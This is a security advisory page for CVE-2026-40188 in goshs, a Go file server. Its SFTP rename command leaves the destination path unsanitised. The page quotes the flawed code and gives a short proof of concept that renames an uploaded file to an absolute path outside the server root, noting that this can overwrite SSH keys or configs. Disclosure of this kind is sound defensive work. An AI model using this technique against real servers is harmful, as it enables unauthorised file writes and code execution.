Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-2943-crp8-38xx

Опубликовано: 10 апр. 2026
Источник: github
Github: Прошло ревью
CVSS3: 7.7

Описание

goshs is Missing Write Protection for Parametric Data Values

Summary

The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP.

Details

Here is the issue:

// helper.go:155-215 func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error { fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED if err != nil { return err } switch r.Method { // ... case "Rename": err := os.Rename(fullPath, r.Target) // Destination: NOT SANITIZED!

PoC

To exploit just upload a file on the SFTP and rename it to a file with full path.

Currently no key.txt file inside /tmp

$ ls key.txt ls: key.txt: No such file or directory

Start the SFTP server:

/tmp/sftp-server $ goshs -sftp -b 'user:user' -d . WARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of 'sftp' mode WARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs. INFO [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022 WARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too. INFO [2026-04-02 20:00:18] Using basic auth with user 'user' and password 'user' INFO [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded INFO [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000 INFO [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000 INFO [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server

Connect to the SFTP and uploading the file:

$ sftp -P 2022 user@localhost user@localhost's password: Connected to localhost. sftp> put /Users/user/Downloads/key.txt Uploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt key.txt 100% 15 40.9KB/s 00:00

The file is stored properly.

goshs log:

INFO [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - "/tmp/sftp-server/key.txt"

Rename command with full path:

sftp> rename key.txt /tmp/key.txt

goshs log:

INFO [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - "/tmp/sftp-server/key.txt to /tmp/key.txt"

Key file is now in /tmp

$ ls key.txt key.txt

Impact

This allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.

Ссылки

Пакеты

Наименование

github.com/patrickhener/goshs

go
Затронутые версииВерсия исправления

>= 1.0.7, <= 1.1.4

Отсутствует

EPSS

Процентиль: 7%
0.00025
Низкий

7.7 High

CVSS3

CVE ID

CVE-2026-40188

Дефекты

CWE-1314

Связанные уязвимости

nvd логотип

CVE-2026-40188

CVSS3: 7.7
nvd
5 дней назад

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.

EPSS

Процентиль: 7%
0.00025
Низкий

7.7 High

CVSS3

CVE ID

CVE-2026-40188

Дефекты

CWE-1314